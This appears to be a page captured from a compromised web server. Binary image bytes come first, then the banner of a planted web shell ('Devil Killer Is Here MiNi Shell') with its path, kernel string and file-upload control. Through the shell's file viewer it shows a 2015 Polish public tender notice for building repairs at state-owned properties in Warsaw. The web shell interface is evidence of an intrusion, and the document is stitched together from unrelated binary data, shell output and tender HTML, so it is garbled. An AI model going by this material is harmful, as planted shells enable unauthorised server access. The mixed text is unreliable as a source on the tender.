JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151123/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151123/314988-N-2015.html

<p class="kh_header"><b>Warszawa: USŁUGI NAPRAWCZE ORAZ USUWANIE USZKODZEŃ I AWARII W BUDYNKACH ZNAJDUJĄCYCH SIĘ W ZASOBACH SKARBU PAŃSTWA, ZARZADZANYCH PRZEZ ZARZĄD MIENIA SKARBU PAŃSTWA w WARSZAWIE w ZAKRESIE BRANŻY OGÓLNOBUDOWLANEJ.</b><br>
<b>Numer ogłoszenia: 314988 - 2015; data zamieszczenia: 23.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia Skarbu Państwa , pl. Starynkiewicza 7/9, 02-015 Warszawa, woj. mazowieckie, tel. 22 551 21 00, faks 22 551 21 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zmsp.bip.um.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI NAPRAWCZE ORAZ USUWANIE USZKODZEŃ I AWARII W BUDYNKACH ZNAJDUJĄCYCH SIĘ W ZASOBACH SKARBU PAŃSTWA, ZARZADZANYCH PRZEZ ZARZĄD MIENIA SKARBU PAŃSTWA w WARSZAWIE w ZAKRESIE BRANŻY OGÓLNOBUDOWLANEJ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia.
     
a) WYKAZ BUDYNKÓW 100% SKARBU PAŃSTWA

	do wykonywania napraw i usuwania awarii w branży budowlanej na 2016 r
						
L.P.	Dzielnica	Adres	Ilość lok. użytkowych	Ilość lok. mieszkalnych	Vat	Uwagi
1	2	3	4	5	6	7
1	Śródmieście	Al.Jerozolimskie  32	3	1	23% 	 
2	Mokotów	Antoniewska 3D		1	8%	 
3	Wesoła	Armii Krajowej 100 		6	8%	 
4	Mokotów	Augustówka 4		9	8%	 
5	Mokotów	Belgijska 9 - hala garaż.	1		23%	 
6	Praga Płn.	Biruty 18		16	8%	 
7	Praga Płd.	Białowieska 17 - garaże	4		23%	 
8	Wawer	Bławatków 11/13		1	8%	 
9	Ursus	Bohaterów Warszawy 31	1		23%	 
10	Mokotów	Bokserska 77	3		23%	 
11	Mokotów	Chełmska 25 - garaże	10		23%	 
12	Białołęka	Ciupagi 2 A	1	30	8%	 
13	Białołęka	Ciupagi 2 B      	1	28	8%	 
14	Białołęka	Ciupagi 2 C      		30	8%	 
15	Białołęka	Ciupagi 2 D     		30	8%	 
16	Białołęka	Ciupagi 2 I      		24	8%	 
17	Białołęka	Ciupagi 2 II      		24	8%	 
18	Białołęka	Ciupagi 2 III     	1	19	8%	 
19	Włochy	Czereśniowa 53		4	8%	 
20	Śródmieście	Czerniakowska 128		9	8%	 
21	Białołęka	Fletniowa 47C		1	8%	 
22	Mokotów	Gierymskiego 1		30	8%	 
23	Włochy	Instalatorów 5	1		23%	 
24	Mokotów	Jadźwingów 18		16	8%	 
25	Mokotów	Jarmużowa 4 (Zawodzie 28)		1	8%	 
26	Śródmieście	Jazdów 10 A	1		23%	 
27	Mokotów	Klarysewska 57		20	8%	 
28	Śródmieście	Konopnickiej 5 - garaże	2		23%	 
29	Wawer	Korkowa 163	1	8	23%	 
30	Mokotów	Kostrzyńska 24		10	8%	 
31	Żoliborz	Kozietulskiego 4 B   		6	8%	 
32	Żoliborz	Koźmiana 8 - garaże	5		23%	 
33	Mokotów	Lewicka13/15 - hala garaż.	1		23%	 
34	Wawer	Lucerny 106      		7	8%	 
35	Śródmieście	Ludna 4      	1	31	8%	 
36	Praga Płn.	11 Listopada  17/19 bud 3	1		23%	 
37	Włochy	Nike 24		7	8%	 
38	Śródmieście	Nowy Świat 23   	1	3	8%	 
39	Mokotów	Olkuska 6		28	8%	 
40	Mokotów	Piramowicza 25		1	8%	 
41	Żoliborz	Powązkowska 80   		20	8%	 
42	Mokotów	Powsińska 73		41	8%	 
43	Mokotów	Powsińska 73 - garaże	19		23%	 
44	Wola	Radiowa 49 - Fort  	1		23%	 
45	Praga Płn.	Radzymińska 105	1	22	8%	 
46	Wilanów	Rydzowa1/Maślaków 		1	23%	 
47	Śródmieście	Senatorska 38	1	2	23%	 
48	Wawer	Skrzyneckiego 16	1		23%	 
49	Wola	Smolki 9		1	8%	 
50	Wola	Sosnowiecka 58		1	8%	 
51	Wola	Szymczaka - garaże	3		23%	 
52	Wola	Tunelowa 10 - garaże                                  	44		23%	 
53	Wawer	Walcownicza 28 C   		1	8%	 
54	Mokotów	Willowa 6		5	8%	 
55	Służewiec	Wołoska 26  garaże	10		23%	 
56	Służewiec	Wołoska 26 A garaże	16		23%	 
57	Śródmieście	Wybrzeże Kościuszkowskie 23 garaże	8		23%	 
58	Teren Warszawy 	Nieruchomości S.P. znajdujące się w zasobach Z.M.S.P. w bud. wspólnot i innych administracjach, oraz nieruchomości takie jak kanały, drogi, chodniki, garaże itp..			23%	 


b) Zakres prac - stolarskich należący do obowiązków Wykonawcy

1.	Naprawa, regulacja, dopasowanie stolarki okiennej i drzwiowej.
2.	Wymiana lub uzupełnienie poszczególnych elementów stolarki drzwiowej i okiennej.
3.	Naprawa, uzupełnienie lub wymiana progów drzwiowych.
4.	Uzupełnienie lub wymiana listew w stolarce okiennej, drzwiowej i listew podłogowych.
5.	Mocowanie poluzowanych parapetów, okapników wraz z ich uzupełnieniem lub wymianą.
6.	Naprawa, uzupełnienie lub wymiana okuć okiennych i drzwiowych.
7.	Naprawa, uzupełnienie drewnianych elementów stolarki budowlanej w budynku i na terenie przyległym do budynku (schody, szafki, barierki, gabloty, podłogi, ekrany, kratki, wycieraczki).
8.	Naprawa, uzupełnienie odeskowania piaskownic, ławek, altanek śmietnikowych, wywietrzników 
i wyłazów  schronowych na terenie przyległych budynków.
9.	Naprawa lub wymiana ekranów w lokalach mieszkalnych (na polecenie Kierownika).
10.Impregnacja pokostem, malowanie farbą ochronną naprawianych, uzupełnianych 
lub  wymienianych elementów drewnianych.
11. Świadczenie usług pogotowia technicznego wraz z usunięciem awarii.


c) Zakres prac - ślusarskich  należący do obowiązków Wykonawcy

1. Naprawa okuć wraz z ich ewentualną wymianą lub uzupełnieniem w ślusarce okiennej i drzwiowej.
2. Naprawa, ewentualna wymiana lub uzupełnienie pokryw studzienek.
3. Naprawa, ewentualna wymiana lub montaż samozamykaczy z uzupełnieniem oleju i smarowaniem.
4. Naprawa, regulacja ślusarki okiennej i drzwiowej wraz z ewentualną wymianą zużytych  poszczególnych elementów oraz wykonanie smarowania okuć.
5. Naprawa szuflad zsypowych, drabin, włazów na dachy, ogrodzeń, balustrad, krat itp. wraz z ewentualną wymianą poszczególnych elementów w budynku i terenie przyległym do budynku.
6. Przepychanie zsypów w razie ewentualnej potrzeby.
7. Naprawa, uzupełnienie poszczególnych elementów, wycieraczek i skrobaczek do obuwia   przed klatkami i w klatkach schodowych.
8. Montaż lub wymiana tablic hipotecznych, nr  klatek schodowych, informacyjnych budynku, 
na budynku i terenie przyległym do budynku.
9. Naprawa drzwiczek, wnęk i szafek nie elektrycznych z ich wymianą lub montażem nowych  
w budynku, na budynku i terenie przyległym do budynku.
10.Usunięcie niebezpiecznych elementów metalowych w budynku, na budynku i terenie przyległym 
do budynku.
11.Naprawa, uzupełnienie lub ewentualna wymiana poszczególnych elementów ławek, altanek śmietnikowych, trzepaków, huśtawek, wywietrzników i wyłazów schronów, znaków informacyjnych, krat okiennych w budynku i na terenie przyległym do budynku.
12.Malowanie farbą ochronną w kolorze podobnym naprawianych, uzupełnianych lub wymienianych elementów metalowych.
13. Świadczenie usług pogotowia technicznego wraz z usunięciem awarii.
 

d) Zakres prac - szklarskich należący do obowiązków Wykonawcy

1. Uzupełnianie lub wymiana oszklenia stolarki, ślusarki okiennej i drzwiowej.
2. Uzupełnienie lub wymiana oszklenia stolarki i ślusarki budowlanej tj. szafki licznikowe,
     wnękowe, tablice informacyjne, drzwi kabinowe i itp.
3. Uzupełnienie lub wymiana okitowania i uszczelnienia szyb.
4. Podmalowanie po robotach szklarskich.
5. Świadczenie usług pogotowia technicznego wraz z usunięciem awarii.
 

e) Zakres prac - ogólnobudowlanych należący do obowiązków Wykonawcy

1.	Zbicie i uzupełnienie tynków (odparzonych) na sufitach i ścianach, mając na względzie   bezpieczeństwo lokatorów.
2.	Zbicie odparzonych tynków na elewacji i balkonach mając na względzie bezpieczeństwo    ludzi.
3.	Uzupełnienie lub zbicie z wyrównaniem szlichty posadzek w budynku i terenie przyległym 
do budynku, oraz balkonach z wykonaniem odpowiednich spadków i uszczelnieniem styków z murem.
4.	Montaż gotowych elementów takich jak: szafki, osłony, zawiasy, haki, gabloty ogłoszeniowe, tablice informacyjne, ościeżnice okienne i drzwiowe lub ich  ewentualna wymiana, w budynku 
i na terenie przyległym do budynku.
5.	Naprawa z uzupełnieniem tynku i ewentualnym malowaniem piaskownic, murków, schodów, altanek śmietnikowych, wywietrzników i wyłazów schronów itp.
6.	Wykonanie umocowania ławek, trzepaków, wycieraczek, barierek, skrzynek, szuflad zsypów, okienek piwnicznych, otworów drzwiowych i okiennych itp.
7.	Malowanie altanek śmietnikowych, murków, wywietrzników i wyłazów schronów, piaskownic 
na terenie przyległym do budynku.
8.	Wykonanie podmalowania po robotach ogólnobudowlanych.
9. Świadczenie usług pogotowia technicznego wraz z usunięciem awarii.
 

f) Zakres prac -  dekarsko-blacharskich należący do obowiązków Wykonawcy

1.	Drobna naprawa powierzchni dachu krytego papą z wykonaniem smarówki na naprawianej     powierzchni.
2.	Wstawienie łat w pokrycie papowe, których suma nie przekracza  1% powierzchni dachu.
3.	Czyszczenie rynien wraz z nadaniem spadku i drobną naprawą.
4.	Czyszczenie rur spustowych do czyszczaka deszczówki wraz z uzupełnieniem dekli.
5.	Wymiana rynien do około.
6.	Wymiana rur spustowych.
7.	Drobna naprawa obróbek blacharskich, nadanie spadków, prostowanie.
8.	Wymiana obróbek blacharskich.
9.	Naprawa obróbek blacharskich balkonów i tarasów wraz z robotami towarzyszącymi  (na polecenie Kierownika ).
10.Naprawa podokienników ( na polecenie Kierownika ).
11.Naprawa dachów krytych blachą, uszczelnienie pokrycia.
12.Naprawa lub wymiana wyłazów na dach - uszczelnienie, umocowanie.
13.Wykonanie czyszczenie powierzchni dachu z obfitych opadów śniegu oraz skucie lodu z obróbek blacharskich.
14. Świadczenie usług pogotowia technicznego wraz z usunięciem awarii.

Dokładny opis przedmiotu zamówienia znajduje się w SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.00.00-1, 45.44.10.00-0, 45.45.41.00-5, 45.44.00.00-3, 45.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przetargu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:

1)	Posiadają uprawnienia budowlane w branży ogólnobudowlanej, lub zatrudniają osobę posiadającą takie uprawnienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Wykaz iż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy to  w tym okresie, należycie wykonali co najmniej 3 zamówienia obejmujące usługi o charakterze i złożoności podobnej do przedmiotu zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania - wg wzoru stanowiącego załącznik Nr 3 do SIWZ.
Do wykazu należy dołączyć dokumenty potwierdzające, że usługi te zostały wykonane z należytą starannością, odnośnie usług, których wykonanie zostało zakończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji niezbędnymi do wykonania zamówienia, a także zakres wykonywanych przez nich czynności - wg wzoru stanowiącego załącznik nr 7 do SIWZ wraz z dokumentami potwierdzającymi posiadanie co najmniej przez jedną osobę uprawnień ogólnobudowlanych i wpis na listę Okręgowej Izby Inżynierów.
Do wykazu należy dołączyć kopię uprawnień potrzebnych kwalifikacji niezbędnych do wykonania przedmiotu umowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Dokument potwierdzający dopuszczenie Oferenta do obrotu prawnego w zakresie objętym zamówieniem - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
b)	aktualne (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert) zaświadczenie/oświadczenie z właściwego Urzędu Skarbowego potwierdzające, że oferent nie zalega z opłacaniem podatków lub że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego,
c)	aktualne (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert) zaświadczenie/oświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające, że oferent nie zalega z opłacaniem opłat lub składek na ubezpieczenie społeczne lub że uzyskał zgodę na zwolnienie, odroczenie  lub rozłożenie na raty zaległych płatności,
d)	polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w kwocie min. 100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Liczba roboczo-godzin od każdego zlecenia za dojazd w niedzielę i święta - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zmsp.bip.um.warszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Plac Starynkiewicza 7/9 02-015 Warszawa pokój nr 311.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2015 godzina 12:00, miejsce: Plac Starynkiewicza 7/9 02-015 Warszawa pokój nr 307.</p>
